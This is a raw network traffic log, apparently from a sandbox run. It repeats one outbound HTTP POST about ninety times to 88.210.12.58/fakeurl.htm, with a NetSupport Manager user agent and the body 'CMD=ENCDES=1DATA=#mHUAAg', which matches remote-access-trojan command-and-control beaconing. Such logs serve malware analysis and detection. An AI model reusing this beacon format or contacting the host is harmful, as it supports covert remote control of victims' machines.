Dec 10, 2024 09:00:13.598057985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.702800989 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.799144983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.900055885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.002887011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.100169897 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.201378107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.301089048 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.402041912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.503070116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.603183031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.703185081 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.804160118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:14.905086994 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.006082058 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.112797022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.207077026 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.308785915 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.408051968 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.508793116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.608052969 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.710809946 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.812792063 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:15.912796021 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.010078907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.111076117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.212083101 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.313091993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.414062023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.514110088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.614136934 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.714054108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.815160036 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:16.915108919 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.018922091 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.116056919 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.217072964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.318897963 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.418812037 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.517061949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.620789051 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.718116045 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.820796967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:17.920069933 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:18.021188974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:18.130229950 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:18.432214022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:18.740113974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:18.841094971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:18.942131996 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.044796944 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.144793987 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.243066072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.343071938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.444067001 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.546979904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.646843910 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.746077061 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.847160101 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:19.947201967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.048110008 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.149079084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.252096891 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.353104115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.453087091 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.554074049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.654196978 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.755070925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.855201006 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:20.967271090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.070918083 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.174957991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.294564962 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.396473885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.496073961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.599857092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.698080063 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.798067093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:21.900810003 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.000808954 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.100112915 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.201097965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.301130056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.402089119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.503072023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.603105068 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.704066038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.804135084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:22.904217005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.004086018 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.107364893 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.206798077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.305074930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
